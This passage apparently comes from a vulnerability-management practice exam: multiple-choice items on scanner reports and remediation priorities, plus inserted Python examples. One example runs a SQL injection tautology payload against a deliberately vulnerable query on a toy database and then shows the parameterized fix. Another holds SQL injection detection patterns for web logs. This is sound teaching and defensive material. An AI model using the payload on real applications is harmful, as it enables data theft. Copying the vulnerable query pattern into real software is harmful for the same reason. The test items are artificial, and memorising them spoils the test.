Reference Information 


BID: 69018 


A. Upgrade to the most recent version of Microsoft Exchange. 
B. Upgrade to the most recent version of Microsoft Windows. 
C. Implement the use of strong encryption. 
D. No action is required. 


35. A SQL injection exploit typically gains access to a database by exploiting a vulnerability in 

A. Operating system 
B. Web application 
C. Database server 
D. Firewall 
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Questions 36 through 38 refer to the following scenario: 


Ryan ran a vulnerability scan of one of his organization’s production systems and received 
the report shown here. He would like to understand this vulnerability better and then 
remediate the issue. 


[Severity 4] Microsoft IIS Server XSS Elevation of Privilege Vulnerability (MS17-016) 

First Detected: 04/04/2017 at 21:30:12 (GMT-0400)   Last Detected: 04/04/2017 at 21:30:12 (GMT-0400) 
QID: 91339 
Category: Windows 
CVE ID: CVE-2017-0055 
Vendor Reference: MS17-016 
Bugtraq ID: 96622 
Service Modified: 03/17/2017 
User Modified: - 
Edited: No 
PCI Vuln: Yes 
Ticket State: Open 
CVSS Base: 4.3   CVSS Temporal: 3.2 
CVSS3 Base: 6.1   CVSS3 Temporal: 5.3 
CVSS Environment (Asset Group, Collateral Damage Potential, Target Distribution, Confidentiality/Integrity/Availability Requirement): not set 

THREAT: 
An elevation of privilege vulnerability exists when Microsoft IIS Server fails to properly sanitize a specially crafted request. 


36. Ryan will not be able to correct the vulnerability for several days. In the meantime, he would like to configure his intrusion prevention system to watch for issues related to this vulnerability. Which one of the following protocols would an attacker use to exploit this vulnerability? 

A. SSH 
B. HTTPS 
C. FTP 
D. RDP 


37. Which one of the following actions could Ryan take to remediate the underlying issue 
without disrupting business activity? 


A. Disable the IIS service. 

B. Apply a security patch. 

C. Modify the web application. 
D. Apply IPS rules. 


38. If an attacker is able to exploit this vulnerability, what is the probable result that will have 
the highest impact on the organization? 


A. Administrative control of the server 
B. Complete control of the domain 
C. Access to configuration information 
D. Access to web application logs 


Chapter 2: Domain 2: Vulnerability Management 

39. Ted is configuring vulnerability scanning for a file server on his company’s internal network. The server is positioned on the network as shown here. What types of vulnerability scans should Ted perform to balance the efficiency of scanning effort with expected results? 

[Network diagram: the Internet; a DMZ holding the Web Server (10.16.25.103/12.6.14.5); an internal network holding the File Server (192.168.0.16) and the Database Server (192.168.0.22).] 

A. Ted should not perform scans of servers on the internal network. 
B. Ted should only perform internal vulnerability scans. 
C. Ted should only perform external vulnerability scans. 
D. Ted should perform both internal and external vulnerability scans. 
40. Kristen is attempting to determine the next task that she should take on from a list of security priorities. Her boss told her that she should focus on activities that have the most “bang for the buck.” Of the tasks shown here, which should she tackle first? 

[Table: Security Issue | Criticality | Time Required to Fix (one row for each of Tasks 1 through 4)] 





A. Task 1 
B. Task 2 
C. Task 3 
D. Task 4 
41. Kevin manages the vulnerability scans for his organization. The senior director that oversees Kevin’s group provides a report to the CIO on a monthly basis on operational activity, and he includes the number of open critical vulnerabilities. Kevin would like to provide this information to his director in as simple a manner as possible each month. What should Kevin do? 


A. Provide the director with access to the scanning system. 
B. Check the system each month for the correct number and email it to the director. 


C. Configure a report that provides the information to automatically send to the director’s email at the proper time each month. 


D. Ask an administrative assistant to check the system and provide the director with the 
information. 


42. Morgan is interpreting the vulnerability scan from her organization’s network, shown here. She would like to determine which vulnerability to remediate first. Morgan would like to focus on vulnerabilities that are most easily exploitable by someone outside her organization. Assuming the firewall is properly configured, which one of the following vulnerabilities should Morgan give the highest priority? 

[Network diagram: the Internet; a DMZ holding the Email Server and the Web Server; a File Server on the internal network.] 

A. Severity 5 vulnerability in the workstation 
B. Severity 1 vulnerability in the file server 
C. Severity 5 vulnerability in the web server 
D. Severity 1 vulnerability in the mail server 
43. Mike runs a vulnerability scan against his company’s virtualization environment and finds the vulnerability shown here in several of the virtual hosts. What action should Mike take? 

HTTP Methods Allowed (per directory) 

Description 

By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. 

As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. 

A. No action is necessary because this is an informational report. 
B. Mike should disable HTTP on the affected devices. 
C. Mike should upgrade the version of OpenSSL on the affected devices. 
D. Mike should immediately upgrade the hypervisor. 


44. Juan recently scanned a system and found that it was running services on ports 139 and 445. What operating system is this system most likely running? 

A. Ubuntu 
B. macOS 
C. CentOS 
D. Windows 


45. Gene is concerned about the theft of sensitive information stored in a database. Which one of the following vulnerabilities would pose the most direct threat to this information? 

A. SQL injection 
B. Cross-site scripting 
C. Buffer overflow 
D. Denial of service 
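The point behind questions 35 and 45 (and question 50 later in this chapter) is that SQL injection is a flaw in how the web application builds its query, not a flaw in the database engine, and that it reaches stored data directly. The script below is an added worked example, not part of the original question bank. It builds an in-memory SQLite table with constructed sample rows and runs the same tautology payload through the vulnerable string-building pattern and through the parameterized fix.

```python
import sqlite3

# Constructed sample data for the demonstration (not from any real system).
ROWS = [("alice", "4242"), ("bob", "1111"), ("carol", "9876")]

# The classic tautology payload: closes the quoted string and appends an always-true clause.
PAYLOAD = "' OR '1'='1"


def build_db():
    """Create an in-memory database holding a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, card_last4 TEXT)"
    )
    conn.executemany("INSERT INTO users (username, card_last4) VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """Web-application flaw: untrusted input is spliced into the SQL text.

    With PAYLOAD the statement becomes
        SELECT ... WHERE username = '' OR '1'='1'
    and the database, doing exactly what it was asked, returns every row.
    """
    sql = "SELECT username, card_last4 FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Fix: bind the value as a parameter so it can never change the query's structure."""
    sql = "SELECT username, card_last4 FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    """Run the same payload through both versions and return what each one gives back."""
    conn = build_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "parameterized": lookup_parameterized(conn, PAYLOAD),
        "legitimate": lookup_parameterized(conn, "alice"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print("%-14s -> %d row(s): %s" % (label, len(rows), rows))
```

The vulnerable lookup hands back all three rows for the payload; the parameterized lookup returns none, because the driver sends the payload as a value and the quote characters never reach the SQL parser. Note that sqlite3's execute() refuses to run more than one statement, which is why a stacked-query payload such as a trailing DROP TABLE is not demonstrated here; other drivers and databases do allow it.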


46. Which one of the following protocols is not likely to trigger a vulnerability scan alert when used to support a virtual private network (VPN)? 

A. IPsec 
B. SSLv2 
C. PPTP 
D. SSLv3 


47. Rahul ran a vulnerability scan of a server that will be used for credit card processing in his environment and received a report containing the vulnerability shown here. What action must Rahul take? 

[Severity 2] Web Server HTTP Trace/Track Method Support Cross-Site Tracing Vulnerability 

First Detected: 02/16/2015 at 12:59:07 (GMT-0400)   Last Detected: 04/05/2017 at 05:08:25 (GMT-0400) 
QID: 86473 
Category: Web server 
CVE ID: CVE-2004-2320, CVE-2007-3008 
Vendor Reference: - 
Bugtraq ID: 24456, 9506 
Service Modified: 08/20/2013 
User Modified: - 
Edited: No 
PCI Vuln: Yes 
Ticket State: 
CVSS Base: 5.8   CVSS Temporal: 5 
CVSS3 Base: -   CVSS3 Temporal: - 
CVSS Environment (Asset Group, Collateral Damage Potential, Target Distribution, Confidentiality/Integrity/Availability Requirement): - 

THREAT: 

A Web server was detected that supports the HTTP TRACE method. This method allows debugging and connection trace analysis for connections from the client to the Web server. Per the HTTP specification, when this method is used, the Web server echoes back the information sent to it by the client unmodified and unfiltered. Microsoft IIS web server uses an alias TRACK for this method, and is functionally the same. 

A vulnerability related to this method was discovered. A malicious, active component in a Web page can send Trace requests to a Web server that supports this Trace method. Usually, browser security disallows access to Web sites outside of the present site's domain. Although unlikely and difficult to achieve, it's possible, in the presence of other browser vulnerabilities, for the active HTML content to make external requests to arbitrary Web servers beyond the hosting Web server. Since the chosen Web server then echoes back the client request unfiltered, the response also includes cookie-based or Web-based (if logged on) authentication credentials that the browser automatically sent to the specified Web application on the specified Web server. 

The significance of the Trace capability in this vulnerability is that the active component in the page visited by the victim user has no direct access to this authentication information, but gets it after the target Web server echoes it back as its Trace response. 

Since this vulnerability exists as a support for a method required by the HTTP protocol specification, most common Web servers are vulnerable. The exact method(s) supported, Trace and/or Track, and their responses are in the Results section below. 

Track / Trace are required to be disabled to be PCI compliant. 

IMPACT: 

If this vulnerability is successfully exploited, users of the Web server may lose their authentication credentials for the server and/or for the Web applications hosted by the server to an attacker. This may be the case even if the Web applications are not vulnerable to cross site scripting attacks due to input validation errors. 

A. Remediate the vulnerability when possible. 
B. Remediate the vulnerability prior to moving the system into production and rerun the scan to obtain a clean result. 
C. Remediate the vulnerability within 90 days of moving the system to production. 
D. No action is required. 


Questions 48 and 49 refer to the following scenario: 

Aaron is scanning a server in his organization’s data center and receives the vulnerability report shown here. The service is exposed only to internal hosts. 

[Severity 2] NTP Information Disclosure Vulnerability   port 123/udp   CVSS: -   CVSS3: -   Active 
First Detected: 07/16/2014 at 20:06:22 (GMT-0400)   Last Detected: 04/04/2017 at 23:18:46 (GMT-0400)   Times Detected: 54   Last Fixed: N/A 
QID: 38293 
Category: General remote services 
CVE ID: - 
Vendor Reference: - 
Bugtraq ID: - 
Service Modified: 06/06/2013 
User Modified: - 
Edited: No 
PCI Vuln: No 
Ticket State: 
CVSS Base: 2.6   CVSS Temporal: 2.1 
CVSS3 Base: -   CVSS3 Temporal: - 
CVSS Environment (Asset Group, Collateral Damage Potential, Target Distribution, Confidentiality/Integrity/Availability Requirement): not set 

THREAT: 
The NTP service running on the host allows queries of NTP variables. 

IMPACT: 
A remote user can obtain sensitive information about the host by querying various variables. The information obtained can aid in further attacks against the system. 

SOLUTION: 
Please reconfigure NTP to restrict remote access. 
If you require assistance in configuring NTP, please refer to your vendor. For an overview of NTP service access restrictions, please see the NTP access restrictions documentation. 

EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 
48. What is the normal function of the service with this vulnerability? 

A. File transfer 
B. Web hosting 
C. Time synchronization 
D. Network addressing 

49. What priority should Aaron place on remediating this vulnerability? 

A. Aaron should make this vulnerability his highest priority. 
B. Aaron should remediate this vulnerability urgently but does not need to drop everything. 
C. Aaron should remediate this vulnerability within the next month. 
D. Aaron does not need to assign any priority to remediating this vulnerability. 

50. Without access to any additional information, which one of the following vulnerabilities would you consider the most severe if discovered on a production web server? 

A. CGI generic SQL injection 
B. Web application information disclosure 
C. Web server uses basic authentication without HTTPS 
D. Web server directory enumeration 
51. Gina ran a vulnerability scan on three systems that her organization is planning to move to production and received the results shown here. How many of these issues should Gina require be resolved before moving to production? 

10.32.   HP iLO 
Vulnerabilities (5) 
4  RPC Mountd Allows Remote Anonymous File System Root Mount   CVSS: -   CVSS3: -   Fixed 
3  SSL/TLS use of weak RC4 cipher   port 443/tcp over SSL   CVSS: -   CVSS3: -   Fixed 
3  SSL/TLS Server supports TLSv1.0   port 443/tcp over SSL   CVSS: -   CVSS3: -   Fixed 
3  Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32)   port 443/tcp over SSL   CVSS: -   CVSS3: -   Fixed 
3  SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability (BEAST)   port 443/tcp over SSL   CVSS: -   CVSS3: -   Fixed 

10.32.   Virtualized Linux Guest 
Vulnerabilities (2) 
3  SSL/TLS Server supports TLSv1.0   port 50000/tcp over SSL   CVSS: -   CVSS3: -   Fixed 
3  Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32)   port 50000/tcp over SSL   CVSS: -   CVSS3: -   Fixed 

10.32.   Virtualized Linux Guest 
Vulnerabilities (2) 
3  Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32)   port 50000/tcp over SSL   CVSS: -   CVSS3: -   Fixed 
3  SSL/TLS Server supports TLSv1.0   port 50000/tcp over SSL   CVSS: -   CVSS3: -   Fixed 

A. 0. 
B. 1. 
C. 3. 
D. All of these issues should be resolved. 
52. Morgan recently restarted an old vulnerability scanner that had not been used in more than a year. She booted the scanner, logged in, and configured a scan to run. After reading the scan results, she found that the scanner was not detecting known vulnerabilities that were detected by other scanners. What is the most likely cause of this issue? 


A. The scanner is running on an outdated operating system. 
B. The scanner’s maintenance subscription is expired. 

C. Morgan has invalid credentials on the scanner. 

D. The scanner does not have a current, valid IP address. 

53. Carla runs both internal and external vulnerability scans of a web server and detects a possible SQL injection vulnerability. The vulnerability only appears in the internal scan and does not appear in the external scan. When Carla checks the server logs, she sees the requests coming from the internal scan and sees some requests from the external scanner but no evidence that a SQL injection exploit was attempted by the external scanner. What is the most likely explanation for these results? 


A. A host firewall is blocking external network connections to the web server. 

B. A network firewall is blocking external network connections to the web server. 
C. A host IPS is blocking some requests to the web server. 

D. A network IPS is blocking some requests to the web server. 


54. Rick discovers the vulnerability shown here in a server running in his data center. What characteristic of this vulnerability should concern him the most? 

[Severity 4] Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018) 

First Detected: 04/05/2017 at 01:18:07 (GMT-0400)   Last Detected: 04/05/2017 at 01:18:07 (GMT-0400) 
QID: 91342 
Category: Windows 
CVE ID: CVE-2017-0024, CVE-2017-0026, CVE-2017-0056, CVE-2017-0078, CVE-2017-0079, CVE-2017-0080, CVE-2017-0081, CVE-2017-0082 
Vendor Reference: MS17-018 
Bugtraq ID: 96029, 96032, 96630, 96631, 96632, 96633, 96634, … 
Service Modified: 03/17/2017 
User Modified: - 
Edited: No 
PCI Vuln: Yes 
Ticket State: Open 
CVSS Base: 7.2   CVSS Temporal: 5.3 
CVSS3 Base: 7.8   CVSS3 Temporal: 6.8 
CVSS Environment (Asset Group, Collateral Damage Potential, Target Distribution, Confidentiality/Integrity/Availability Requirement): - 

THREAT: 

Multiple elevation of privilege vulnerabilities exist in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. 

The update addresses the vulnerabilities by correcting how the Windows kernel-mode driver handles objects in memory. This security update is rated Important for all supported releases of Microsoft Windows. 

IMPACT: 
The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system. 

SOLUTION: 

Customers are advised to refer to MS17-018 for more information. 
Patch: 

Following are links for downloading patches to fix the vulnerabilities: 
MS17-018: Windows 

EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 

A. It is the subject of a recent security bulletin. 
B. It has a CVSS score of 7.2. 
C. There are multiple Bugtraq and CVE IDs. 
D. It affects kernel-mode drivers. 


55. Carla is designing a vulnerability scanning workflow and has been tasked with selecting the person responsible for remediating vulnerabilities. Which one of the following people would normally be in the best position to remediate a server vulnerability? 

A. Cybersecurity analyst 
B. System administrator 
C. Network engineer 
D. IT manager 


56. During a recent vulnerability scan, Ed discovered that a web server running on his network has access to a database server that should be restricted. Both servers are running on his organization’s VMware virtualization platform. Where should Ed look first to configure a security control to restrict this access? 

A. VMware 
B. Data center firewall 
C. Perimeter (Internet) firewall 
D. Intrusion prevention system 


57. Carl runs a vulnerability scan of a mail server used by his organization and receives the vulnerability report shown here. What action should Carl take to correct this issue? 

[Severity 4] OpenSSL oracle padding vulnerability (CVE-2016-2107)   port 443/tcp over SSL   Active 
First Detected: 08/22/2016 at 20:52:54 (GMT-0400)   Last Detected: 08/26/2016 at 05:02:18 (GMT-0400)   Times Detected: 5   Last Fixed: N/A 
QID: 38626 
Category: General remote services 
CVE ID: CVE-2016-2107 
Vendor Reference: OpenSSL Security Advisory 20160503 
Bugtraq ID: 91787, 89760 
Service Modified: 05/24/2016 
User Modified: 
Edited: No 
PCI Vuln: No 
Ticket State: 

THREAT: 

The OpenSSL Project is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS) protocols as well as a general purpose cryptography library. 

OpenSSL contains the following vulnerability: 

A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server supports AES-NI. 

Affected Versions: 
OpenSSL 1.0.2 prior to OpenSSL 1.0.2h 
OpenSSL 1.0.1 prior to OpenSSL 1.0.1t 

A. Carl does not need to take any action because this is an informational report. 
B. Carl should replace SSL with TLS on this server. 
C. Carl should disable weak ciphers. 
D. Carl should upgrade OpenSSL. 
58. Renee is configuring a vulnerability scanner that will run scans of her network. Corporate policy requires the use of daily vulnerability scans. What would be the best time to configure the scans? 


A. During the day when operations reach their peak to stress test systems 
B. During the evening when operations are minimal to reduce the impact on systems 


C. During lunch hour when people have stepped away from their systems but there is still 
considerable load 


D. On the weekends when the scans may run unimpeded 
59. Ahmed is reviewing the vulnerability scan report from his organization’s central storage service and finds the results shown here. Which action can Ahmed take that will be effective in remediating the highest-severity issue possible? 

NetApp Release 8.1.4P3 7-Mode 

Vulnerabilities (22) 

5  EOL/Obsolete Software: SNMP Version Detected   CVSS: -   CVSS3: -   Active 
3  NetBIOS Shared Folder List Available   CVSS: -   CVSS3: -   Active 
3  NFS Exported Filesystems List Vulnerability   CVSS: -   CVSS3: -   Active 
3  SSL Server Has SSLv3 Enabled Vulnerability   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
3  SSL Server Has SSLv2 Enabled Vulnerability   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
3  SSL/TLS use of weak RC4 cipher   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
3  Readable SNMP Information   port 161/udp   CVSS: -   CVSS3: -   Active 
2  NetBIOS Name Accessible   CVSS: -   CVSS3: -   Active 
2  Hidden RPC Services   CVSS: -   CVSS3: -   Active 
2  YP/NIS RPC Services Listening on Non-Privileged Ports   CVSS: -   CVSS3: -   Active 
2  Default Windows Administrator Account Name Present   CVSS: -   CVSS3: -   Active 
2  SSL Certificate - Server Public Key Too Small   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
2  SSL Certificate - Self-Signed Certificate   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
2  SSL Certificate - Subject Common Name Does Not Match Server FQDN   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
2  SSL Certificate - Signature Verification Failed Vulnerability   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
2  SSL Certificate - Improper Usage Vulnerability   port 443/tcp over SSL   CVSS: -   CVSS3: -   Active 
2  NTP Information Disclosure Vulnerability   port 123/udp   CVSS: -   CVSS3: -   Active 
1  Non-Zero Padding Bytes Observed in Ethernet Packets   CVSS: -   CVSS3: -   Active 
1  mountd RPC Daemon Discloses Exported Directories Accessed by Remote Hosts   CVSS: -   CVSS3: -   Active 
1  "rquotad" RPC Service Present   CVSS: -   CVSS3: -   Active 
1  Presence of a Load-Balancing Device Detected   port 80/tcp   CVSS: -   CVSS3: -   Active 
1  Presence of a Load-Balancing Device Detected   port 443/tcp over SSL   CVSS: -   CVSS3: -   Re-Opened 

A. Upgrade to SNMPv3. 
B. Disable the use of RC4. 
C. Replace the use of SSL with TLS. 
D. Disable remote share enumeration. 


Questions 60 and 61 refer to the following scenario: 


Glenda ran a vulnerability scan of workstations in her organization. She noticed that many of the workstations reported the vulnerability shown here. She would like to not only correct this issue but also prevent the likelihood of similar issues occurring in the future: 


[Severity 4] Google Chrome Prior to 57.0.2987.133 Multiple Vulnerabilities 

First Detected: 04/05/2017 at 03:39:44 (GMT-0400)   Last Detected: 04/05/2017 at 03:39:44 (GMT-0400) 
QID: 370356 
Category: Local 
CVE ID: CVE-2017-5054, CVE-2017-5052, CVE-2017-5056, CVE-2017-5053, CVE-2017-5055 
Vendor Reference: Google Chrome 
Bugtraq ID: - 
Service Modified: 04/09/2017 
User Modified: - 
Edited: No 
PCI Vuln: Yes 
Ticket State: Open 
CVSS Base: 9.3   CVSS Temporal: 6.9 
CVSS3 Base: -   CVSS3 Temporal: - 
CVSS Environment (Asset Group, Collateral Damage Potential, Target Distribution, Confidentiality/Integrity/Availability Requirement): - 
THREAT: 


Google Chrome is a web browser for multiple platforms developed by Google. 
This Google Chrome update fixes the following vulnerabilities: 
CVE-2017-5054: Heap buffer overflow in V8. 

CVE-2017-5052: Bad cast in Blink. 

CVE-2017-5056: Use after free in Blink. 

CVE-2017-5053: Out of bounds memory access in V8. 

CVE-2017-5055: Use after free in printing. 


IMPACT: 


A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive 
information when visited by the victim. 


SOLUTION: 
Customers are advised to upgrade to Google Chrome 57.0.2987.133 or a later version. 
Patch: 


Following are links for downloading patches to fix the vulnerabilities: 
Google Chrome: Windows 
Google Chrome: MAC OS X 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 


60. What action should Glenda take to achieve her goals? 

A. Glenda should uninstall Chrome from all workstations and replace it with Internet Explorer. 
B. Glenda should manually upgrade Chrome on all workstations. 
C. Glenda should configure all workstations to automatically update Chrome. 
D. Glenda does not need to take any action. 

61. What priority should Glenda place on remediating this vulnerability? 

A. Glenda should make this vulnerability her highest priority. 
B. Glenda should remediate this vulnerability urgently but does not need to drop everything. 
C. Glenda should remediate this vulnerability within the next several months. 
D. Glenda does not need to assign any priority to remediating this vulnerability. 
62. After reviewing the results of a vulnerability scan, Beth discovered a flaw in her Oracle database server that may allow an attacker to attempt a direct connection to the server. She would like to review netflow logs to determine what systems have connected to the server recently. What TCP port should Beth expect to find used for this communication? 


A. 443 

B. 1433 
C. 1521 
D. 8080 


63. Greg runs a vulnerability scan of a server in his organization and finds the results shown here. What is the most likely explanation for these results? 

HTTP Server Type and Version 

Description 
This plugin attempts to determine the type and the version of the remote web server. 

Output 
The remote web server type is : 

Microsoft-IIS/6.0 

Port / Hosts 
80 / tcp / www 
443 / tcp / www 
2025 / tcp / www 
2026 / tcp / www 
2027 / tcp / www 
2028 / tcp / www 
2029 / tcp / www 
2030 / tcp / www 
2031 / tcp / www 
2032 / tcp / www 
2033 / tcp / www 
2034 / tcp / www 
2035 / tcp / www 

Plugin Details 
Severity: Info 
ID: 10107 
Version: $Revision: 1.120 $ 
Type: remote 
Family: Web Servers 
Published: 2000/01/04 
Modified: 2014/08/01 

Risk Information 
Risk Factor: None 

A. The organization is running web services on nonstandard ports. 
B. The scanner is providing a false positive error report. 
C. The web server has mirrored ports available. 
D. The server has been compromised by an attacker. 


64. Jim is reviewing a vulnerability scan of his organization’s VPN appliance. He wants to remove support for any insecure ciphers from the device. Which one of the following ciphers should he remove? 

A. ECDHE-RSA-AES128-SHA256 
B. AES256-SHA256 
C. DHE-RSA-AES256-GCM-SHA384 
D. EDH-RSA-DES-CBC3-SHA 
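Question 64 asks which of four OpenSSL cipher-suite names is insecure, and the scan listings in questions 51 and 59 show RC4 and 64-bit-block (Sweet32) suites being flagged. The script below is an added worked example, not part of the original question bank. It parses OpenSSL-style suite names into key exchange, bulk cipher and MAC, then applies the rules a reviewer would apply, keeping findings that require removal separate from the forward-secrecy caveat that a suite such as AES256-SHA256 carries without being considered broken. The classification rules are the editor's, not the scanner's.

```python
import re

# Key-exchange prefixes found in OpenSSL cipher-suite names.
EPHEMERAL_KX = ("ECDHE", "DHE", "EDH")      # ephemeral Diffie-Hellman: forward secrecy
ANONYMOUS_KX = ("ADH", "AECDH")             # no server authentication at all
OTHER_KX = ("ECDH", "DH", "RSA", "PSK", "SRP")
AUTH_ALGS = ("RSA", "ECDSA", "DSS")

# The four suites offered as answers in question 64.
Q64_SUITES = [
    "ECDHE-RSA-AES128-SHA256",
    "AES256-SHA256",
    "DHE-RSA-AES256-GCM-SHA384",
    "EDH-RSA-DES-CBC3-SHA",
]


def parse_openssl_suite(name):
    """Split e.g. 'DHE-RSA-AES256-GCM-SHA384' into ('DHE', 'AES256-GCM', 'SHA384', False).

    The last element says whether the suite is export-grade (EXP- prefix).
    A name with no key-exchange prefix, such as AES256-SHA256, uses RSA key transport.
    """
    parts = name.split("-")
    export = parts[0].startswith("EXP")
    if export:
        parts.pop(0)
    kx = "RSA"
    if parts[0] in EPHEMERAL_KX + ANONYMOUS_KX + OTHER_KX:
        kx = parts.pop(0)
        if parts and parts[0] in AUTH_ALGS:
            parts.pop(0)          # authentication algorithm; not needed for the checks below
    mac = parts.pop()             # SHA, SHA256, SHA384, MD5
    enc = "-".join(parts)         # AES128, AES256-GCM, DES-CBC3, RC4, NULL, ...
    return kx, enc, mac, export


def audit_cipher_suite(name):
    """Return (level, reason) findings; 'remove' means the suite must go, 'warn' is a caveat."""
    kx, enc, mac, export = parse_openssl_suite(name)
    findings = []
    if export:
        findings.append(("remove", "export-grade key length"))
    if "NULL" in enc:
        findings.append(("remove", "NULL cipher: no confidentiality"))
    if re.search(r"(^|-)(DES|IDEA|SEED)(-|$)", enc):
        findings.append(("remove", "64-bit block cipher: Sweet32 birthday attack (DES/3DES)"))
    if "RC4" in enc:
        findings.append(("remove", "RC4: biased keystream allows plaintext recovery"))
    if mac == "MD5":
        findings.append(("remove", "MD5-based MAC"))
    if kx in ANONYMOUS_KX:
        findings.append(("remove", "anonymous key exchange: no server authentication"))
    if kx not in EPHEMERAL_KX and kx not in ANONYMOUS_KX:
        findings.append(("warn", "no forward secrecy: static %s key exchange" % kx))
    return findings


def must_remove(name):
    return any(level == "remove" for level, _ in audit_cipher_suite(name))


def suites_to_remove(names):
    return [n for n in names if must_remove(n)]


if __name__ == "__main__":
    for suite in Q64_SUITES + ["RC4-SHA", "EXP-RC4-MD5"]:
        print("%-28s %s" % (suite, audit_cipher_suite(suite) or "ok"))
```

Run against the four answer options, only EDH-RSA-DES-CBC3-SHA comes back as a suite to remove (3DES has a 64-bit block). AES256-SHA256 is not flagged for removal, but the audit records that it uses static RSA key transport: a captured session can be decrypted later if the server's private key ever leaks, which is why a hardened configuration normally prefers the ECDHE and DHE suites even when the RSA suite is otherwise sound.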


65. Terry recently ran a vulnerability scan against his organization’s credit card processing environment that found a number of vulnerabilities. Which vulnerabilities must he remediate in order to have a “clean” scan under PCI DSS standards? 


A. Critical vulnerabilities 

B. Critical and high vulnerabilities 

C. Critical, high, and moderate vulnerabilities 

D. Critical, high, moderate, and low vulnerabilities 

66. Beth discovers the vulnerability shown here on several Windows systems in her organization. There is a patch available, but it requires compatibility testing that will take several days to complete. What type of file should Beth be watchful for because it may directly exploit this vulnerability? 


[Severity 4] Microsoft Windows PNG Processing Information Disclosure Vulnerability (MS15-024) 

First Detected: 09/28/2015 at 10:42:15 (GMT-0400)   Last Detected: 04/04/2017 at 19:22:26 (GMT-0400) 
QID: 91026 
Category: Windows 
CVE ID: CVE-2015-0080 
Vendor Reference: MS15-024 
Bugtraq ID: 72909 
Service Modified: 03/11/2015 
User Modified: - 
Edited: No 
PCI Vuln: Yes 
Ticket State: Open 
CVSS Base: 4.3   CVSS Temporal: 3.4 
CVSS3 Base: -   CVSS3 Temporal: - 
CVSS Environment (Asset Group, Collateral Damage Potential, Target Distribution, Confidentiality/Integrity/Availability Requirement): not set 


A. Private key files 
B. Word documents 
C. Image files 
D. Encrypted files 


67. During a vulnerability scan, Patrick discovered that the configuration management agent installed on all of his organization’s Windows servers contains a serious vulnerability. The manufacturer is aware of this issue, and a patch is available. What process should Patrick follow to correct this issue? 


A. Immediately deploy the patch to all affected systems. 


B. Deploy the patch to a single production server for testing and then deploy to all 
servers if that test is successful. 


C. Deploy the patch in a test environment and then conduct a staged rollout in 
production. 


D. Disable all external access to systems until the patch is deployed. 


68. Matthew is creating a new forum for system engineers from around his organization to discuss security configurations of their systems. What SCAP component can Matthew take advantage of to help administrators have a standard language for discussing configuration issues? 


A. CPE 
B. CVE 
C. CCE 
D. CVSS 


69. Aaron is configuring a vulnerability scan for a Class C network and is trying to choose a port setting from the list shown here. He would like to choose a scan option that will efficiently scan his network but also complete in a reasonable period of time. Which setting would be most appropriate? 


[Scanner port-setting options: None; Full; Standard Scan (about 1900 ports); Light Scan (about 160 ports); Additional (ex: 1-1024, 8080)] 

A. None 
B. Full 
C. Standard Scan 
D. Light Scan 


70. Hunter discovered that a server in his organization has a critical web application vulnerability and would like to review the logs. The server is running Apache on CentOS with a default configuration. What is the name of the file where Hunter would expect to find the logs? 


A. httpd_log 

B. apache_log 

C. access_log 

D. http_log 
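Question 53 has Carla reading the web server's logs for evidence of injection attempts, and question 70 asks where a default CentOS Apache install keeps them (/var/log/httpd/access_log). The script below is an added worked example, not part of the original question bank. It parses Apache's combined log format and flags request paths that carry common SQL injection markers after URL-decoding. The log lines, hosts, paths and user agents are constructed for the demonstration and do not come from the page.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers of the common injection techniques, matched against the URL-decoded path.
SQLI_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"['\"]\s*(or|and)\s+['\"]?\w+['\"]?\s*=",             # tautology: ' OR '1'='1
        r"\bunion\b.{0,20}\bselect\b",                         # UNION-based extraction
        r"\bsleep\s*\(|\bwaitfor\s+delay\b|\bbenchmark\s*\(",  # time-based blind injection
        r"(--|/\*)\s*$",                                       # comment that swallows the rest of the query
        r";\s*(drop|insert|update|delete|exec)\b",             # stacked queries
    )
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def looks_like_sqli(path):
    """Decode twice so %2527-style double encoding cannot hide a quote, then test the markers."""
    decoded = unquote_plus(unquote_plus(path))
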